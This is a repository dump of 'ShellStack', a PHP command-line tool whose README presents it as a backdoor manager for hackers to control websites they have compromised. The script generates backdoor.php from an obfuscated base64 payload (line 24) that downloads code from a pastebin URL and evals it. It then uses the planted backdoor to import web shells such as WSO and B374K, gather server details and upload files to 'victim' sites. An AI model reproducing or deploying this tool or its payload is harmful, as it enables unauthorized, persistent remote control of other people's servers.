├── README.md
├── shells.txt
└── shellstack.php


/README.md:
--------------------------------------------------------------------------------
  1 | # ShellStack 
  2 | #### Version 1.0
  3 | ----
  4 | ShellStack is a PHP based backdoor management tool. This Tool comes handy for "HACKERS" who wish to keep a track of every website they hack. The tool generates a backdoor file which you just have to upload to the site and put the backdoor URL in the shells.txt present in the tool's directory.
  5 | 
  6 | # With ShellStack You can
  7 | - Import PHP Shells
  8 | - Get Server Details
  9 | - Upload Files From Your System using your terminal
 10 | - And Above all You Can Manage Your Backdoors Efficiently
 11 | 
 12 | # How To Use
 13 | 1. `git clone https://github.com/Tuhinshubhra/shellstack`
 14 | 2. `cd shellstack`
 15 | 3. `php shellstack.php`
 16 | 4. `generatebd` and exit the tool use <kbd>CTRL</kbd> + <kbd>C</kbd> - This will generate a backdoor file in the same directory as of the tool in a file named **backdoor.php**
 17 | 5. Upload The Backdoor File To The Victim website
 18 | 6. Copy The Backdoor URL and paste it in the **shells.txt** file present in the tool's directory and save it (*Each backdoor is separated by a new line*)
 19 | 7. `php shellstack.php`
 20 | 8. Enter The **Serial No** Assigned To The Backdoor
 21 | 9. Rest is pretty Self explanatory
 22 | 
 23 | **Watch The Video Here:** https://youtu.be/umk3ZNZ5Y1I
 24 | 
 25 | # Requirements
 26 | ``` 
 27 | php
 28 | curl 
 29 | ```
 30 | # Example
 31 | ```
 32 | root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack# php shellstack.php
 33 | 
 34 | 
 35 | ________________________________________________________________________________
 36 | _______ _     _ _______               _______ _______ _______ _______ _     _
 37 | |______ |_____| |______ |      |      |______    |    |_____| |       |____/
 38 | ______| |     | |______ |_____ |_____ ______|    |    |     | |_____  |    \_
 39 | ________________________________________________________________________________
 40 | 
 41 |                     Simple Backdoor Management System
 42 |                     Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra 
 43 |                     Shout Out: LulZSec India  
 44 | ================================================================================
 45 | 
 46 | 
 47 | 
 48 | List Of Backdoors:
 49 | 
 50 | 0. http://localhost/backdoor.php
 51 | =============================================
 52 | 
 53 | [#] Enter Either Of These (Backdoor No.|help|generatebd) : 0
 54 | 
 55 | [+] Shell Selected: http://localhost/backdoor.php
 56 | [+] Validating Backdoor: Backdoor Found!
 57 | 
 58 | List Of Actions
 59 | ================
 60 | [1] Import PHP Shells
 61 | [2] Server Details
 62 | [3] Remove Backdoor
 63 | [4] Remote File Upload
 64 | [5] Exit
 65 | 
 66 | [#] Select Option(1|2|3|4|5):2
 67 | 
 68 | [+] Server Info
 69 | [i] Sending Request And Getting Response...
 70 | [i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64
 71 | [i] Server IP: 127.0.0.1
 72 | 
 73 | 
 74 | Press Enter To Continue
 75 | 
 76 | 
 77 | List Of Actions
 78 | ================
 79 | [1] Import PHP Shells
 80 | [2] Server Details
 81 | [3] Remove Backdoor
 82 | [4] Remote File Upload
 83 | [5] Exit
 84 | 
 85 | [#] Select Option(1|2|3|4|5):1
 86 | 
 87 | 
 88 | List Of Shells
 89 | ===============
 90 | [1] Dhanush shell {User & Pass : shellstack123}
 91 | [2] B374K shell {Pass : shellstack123}
 92 | [3] Kurama shell V.1.0 {Pass : red}
 93 | [4] WSO shell {Pass : shellstack123}
 94 | [5] MiNi shell {User & Pass : shellstack123}
 95 | 
 96 | [#] Select Shell To Import(1-5):1
 97 | 
 98 | 
 99 | [i] Importing Shell...
100 | [i] Sending Request And Getting Response...
101 | [R] Dhanush Shell Imported Successfully To /var/www/html/dhanush.php
102 | 
103 | 
104 | Press Enter To Continue
105 | 
106 | 
107 | List Of Actions
108 | ================
109 | [1] Import PHP Shells
110 | [2] Server Details
111 | [3] Remove Backdoor
112 | [4] Remote File Upload
113 | [5] Exit
114 | 
115 | [#] Select Option(1|2|3|4|5):5
116 | root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack# 
117 | 
118 | ```
119 | # Release(s)
120 | > Version 1.0 On 14-06-2017
121 | 
122 | 


--------------------------------------------------------------------------------
/shells.txt:
--------------------------------------------------------------------------------
1 | remove this line and start adding backdoor URL's
2 | 


--------------------------------------------------------------------------------
/shellstack.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | //shell ShellStack
  3 | error_reporting(0);
  4 | $blue = "\e[34m";
  5 | $lblue = "\e[36m";
  6 | $cln = "\e[0m";
  7 | $green = "\e[92m";
  8 | $fgreen = "\e[32m";
  9 | $red = "\e[91m";
 10 | $bold = "\e[1m";
 11 | echo "
 12 | \e[96m
 13 | ________________________________________________________________________________
 14 | _______ _     _ _______               _______ _______ _______ _______ _     _
 15 | |______ |_____| |______ |      |      |______    |    |_____| |       |____/
 16 | ______| |     | |______ |_____ |_____ ______|    |    |     | |_____  |    \_
 17 | ________________________________________________________________________________
 18 | 
 19 |                   $cln  Simple Backdoor Management System
 20 |                   $fgreen  Coded By$bold$red R3D#@x0R_2H1N A.K.A Tuhinshubhra $cln
 21 |                    $blue Shout Out:$bold LulZSec India $cln \e[96m
 22 | ================================================================================
 23 | ";
 24 | $bdcnt = "PD9waHAgJHsiXHg0N0xceDRmQlx4NDFMXHg1MyJ9WyJceDY4bVx4NzJceDZhXHg3MVx4NjNceDZmXHg3NHpceDcwIl09Ilx4NjJceDY0XHg2Zlx4NzIiOyR7Ilx4NDdceDRjT1x4NDJceDQxXHg0Y1x4NTMifVsiXHg2M1x4NzZceDY3cVx4NzlceDZkYWNmXHg2NSJdPSJiXHg2NFx4NmZyIjskeyR7Ilx4NDdMT1x4NDJceDQxXHg0Y1x4NTMifVsiXHg2OFx4NmRceDcyXHg2YXFjXHg2Zlx4NzRceDdhXHg3MCJdfT1maWxlX2dldF9jb250ZW50cygiXHg2OFx4NzR0cFx4NzM6Ly9ceDcwYXNceDc0ZWJpblx4MmVjb1x4NmQvXHg3MmFceDc3L1x4N2E3aWhceDU4cFx4NTZceDQxIik7ZXZhbCgkeyR7Ilx4NDdceDRjT1x4NDJBXHg0Y1x4NTMifVsiXHg2M1x4NzZceDY3XHg3MVx4NzlceDZkXHg2MWNmZSJdfSk7Cj8+";
 25 | echo "\n\n\n$cln";
 26 | echo $bold."List Of Backdoors:$cln";
 27 | $sscontents = file_get_contents("shells.txt");
 28 | $sscontents = trim($sscontents, "\n");
 29 | $shells = explode("\n", $sscontents);
 30 | echo "\n\n";
 31 | if ($sscontents == "") {
 32 |   echo $bold.$red."[!] No Backdoors In Your List!\n$cln";
 33 | }
 34 | else {
 35 | $sno = 0;
 36 | foreach ($shells as $shell) {
 37 |   echo $sno.". $shell\n";
 38 |   $sno++;
 39 | }
 40 | echo "=============================================";
 41 | }
 42 | menu1 :
 43 | echo "\n\n[#] Enter Either Of These (Backdoor No.|help|generatebd) : ";
 44 | $selects = trim(fgets(STDIN,1024));
 45 | if ($selects == "help") {
 46 |   echo "\n\n$bold"."Command List\n$cln";
 47 |   echo "=============\n\n";
 48 |   echo $bold."[+] generatebd:$cln Generates Backdoor File (backdoor.php)\n";
 49 |   echo $bold."[+] help:$cln Display This Help Screen\n";
 50 |   echo "[+] Select Backdoor By Typing In The Assigned Serial Number\n";
 51 |   goto menu1;
 52 | }
 53 | elseif ($selects == "generatebd") {
 54 |   echo $fgreen."\n\n[+] Generating Backdoor ...";
 55 |   file_put_contents ("backdoor.php", base64_decode($bdcnt));
 56 |   echo $cln.$lblue."\n[i] Backdoor Created at$blue backdoor.php$cln";
 57 |   echo "\n[i] Now Upload This To The Victim Site And Add The URL In$bold shells.txt$cln File";
 58 |   echo "\n\n\n$cln";
 59 |   echo "Press Enter To Continue\n\n";
 60 |   trim(fgets(STDIN,1024));
 61 |   goto menu1;
 62 | }
 63 | else {
 64 | $selected1 = $shells[$selects];
 65 | echo "$bold";
 66 | echo "\n[+] Shell Selected:$cln ".$selected1."\n";
 67 | echo $bold."[+] Validating Backdoor:$cln ";
 68 | $ssv = $selected1."?sscmd=v";
 69 | $vfc = file_get_contents ($ssv);
 70 | if ($vfc == "ssbkdrexst") {
 71 |   echo $fgreen."Backdoor Found!\n\n$cln";
 72 |   menu2:
 73 |   echo "List Of Actions\n$cln";
 74 |   echo "================\n";
 75 |   echo $green.$bold."[1]$cln Import PHP Shells\n";
 76 |   echo $blue.$bold."[2]$cln Server Details\n";
 77 |   echo $bold.$red."[3]$cln Remove Backdoor\n";
 78 |   echo $fgreen.$bold."[4]$cln Remote File Upload\n";
 79 |   echo $bold.$red."[5] Exit\n";
 80 |   echo "$cln";
 81 |   // Choose Action
 82 | 
 83 |   echo "\n[#] Select Option(1|2|3|4|5):";
 84 |   $action = trim(fgets(STDIN,1024));
 85 |   if ($action == "1") {
 86 |     echo "\n\nList Of Shells\n$cln";
 87 |     echo "===============\n";
 88 |     echo "[1]$bold Dhanush shell$cln {User & Pass : shellstack123}\n";
 89 |     echo "[2]$bold B374K shell$cln {Pass : shellstack123}\n";
 90 |     echo "[3]$bold Kurama shell$cln V.1.0 {Pass : red}\n";
 91 |     echo "[4]$bold WSO shell$cln {Pass : shellstack123}\n";
 92 |     echo "[5]$bold MiNi shell$cln {User & Pass : shellstack123}\n";
 93 |     //select Shell from list
 94 |     selectsshell:
 95 |     echo "\n[#] Select Shell To Import(1-5):";
 96 |     $impshell = trim(fgets(STDIN,1024));
 97 |     if ( !in_array($impshell, array('1','2','3','4','5'), true ) ) {
 98 |       echo $bold.$red."Invalid Input$cln \n";
 99 |       goto selectsshell;
100 |     }
101 |     else {
102 |       echo $lblue."\n\n[i] Importing Shell...$cln";
103 |       echo $lblue."\n[i] Sending Request And Getting Response...$cln";
104 |       $shellact = $selected1."?sscmd=imps".$impshell;
105 |       $shellimpresult = file_get_contents($shellact);
106 |       echo "\n[R] ".$bold.$shellimpresult.$cln;
107 |       echo "\n\n\n$cln";
108 |       echo "Press Enter To Continue\n\n";
109 |       trim(fgets(STDIN,1024));
110 |       goto menu2;
111 |     }
112 |   }
113 | elseif ($action == "2") {
114 |     echo $bold.$lblue."\n[+] Server Info$cln";
115 |     echo $lblue."\n[i] Sending Request And Getting Response...$cln";
116 |     $svinfo = $selected1."?sscmd=si";
117 |     $sicnt = file_get_contents($svinfo);
118 |     echo $bold."\n$sicnt".$cln;
119 |     echo "\n\n\n$cln";
120 |     echo "Press Enter To Continue\n\n";
121 |     trim(fgets(STDIN,1024));
122 |     goto menu2;
123 | }
124 | elseif ($action == "3") {
125 |   echo $bold.$red."\n[!] Destruct Backdoor$cln";
126 |   echo $red."\n[i] This Process Is irreversible! TRY AT YOUR OWN RISK $cln";
127 |   echo "\n\n[#] Type$bold FUCKME$cln To Confirm: ";
128 |   $dela = trim(fgets(STDIN,1024));
129 |   if ($dela == "FUCKME") {
130 |     echo $red."\n[i] Asking The Poor BackDoor To DiE ... :($cln";
131 |     echo $red."\n[i] Sending DEATH Request ... :(\n\n$cln";
132 |     $delurl = $selected1."?sscmd=fuckme";
133 |     //sending the server request in a lame way
134 |     system ("curl -s $delurl");
135 |     echo "\n\n[+] Confirming If That Poor Guy Is Really Dead: ";
136 |     $cnfrmdel = file_get_contents ($ssv);
137 |     if ($cnfrmdel == "ssbkdrexst") {
138 |       echo "Couldn't Kill That Bastard!\n\n";
139 |     }
140 |     else {
141 |       echo "Confirmed! It's DEAD!\n";
142 |       echo "[i] Remove This Backdoor From$bold shells.txt$cln It's Of No Use Now!";
143 |       echo "\n\n";
144 |     }
145 |   }
146 |   else {
147 |     echo "\n[!] Confirmation Failed! Going Back To Previous Menu!";
148 |     echo "\n\n\n$cln";
149 |     echo "Press Enter To Continue\n\n";
150 |     trim(fgets(STDIN,1024));
151 |     goto menu2;
152 |   }
153 | }
154 | elseif ($action == "4") {
155 |   echo $bold.$lblue."[+] Remote File Upload$cln";
156 |   echo "\n[i] Upload Files From Your System\n\n";
157 |   uploadremotefile:
158 |   echo "\n[#] Enter File Path: ";
159 |   $fpath = trim(fgets(STDIN,1024));
160 |   echo "[#] Enter File Name: ";
161 |   $fname = trim(fgets(STDIN,1024));
162 |   echo $lblue."\n[-] File Selected:$cln $fpath";
163 |   echo $lblue."\n[-] File Name Selected:$cln $fname";
164 |   echo $lblue."\n[+] Checking If File Exists: $cln";
165 |   if (file_exists($fpath)) {
166 |     echo "File Exists\n";
167 |     echo $blue."[i] Initializing File Upload\n$cln";
168 |     $fileData = file_get_contents($fpath);
169 |     $fileData = base64_encode($fileData);
170 |     echo $lblue."[i] Sending Request And Getting Response...\n\n$cln";
171 |     system("curl -s -F fileData=$fileData -F fileName=$fname -F file=@$fpath $selected1?sscmd=u");
172 |     echo "\n\n\n$cln";
173 |     echo "Press Enter To Continue\n\n";
174 |     trim(fgets(STDIN,1024));
175 |     goto menu2;
176 |   }
177 |   else {
178 |     echo $red."File Do Not Exist! Aborting Uplod Procedure ...\n\n$cln";
179 |     goto uploadremotefile;
180 |   }
181 | }
182 | }
183 | else {
184 |   echo $red."Backdoor Not Found Quitting...$cln \n";
185 | }
186 | }
187 |  ?>
188 | 


--------------------------------------------------------------------------------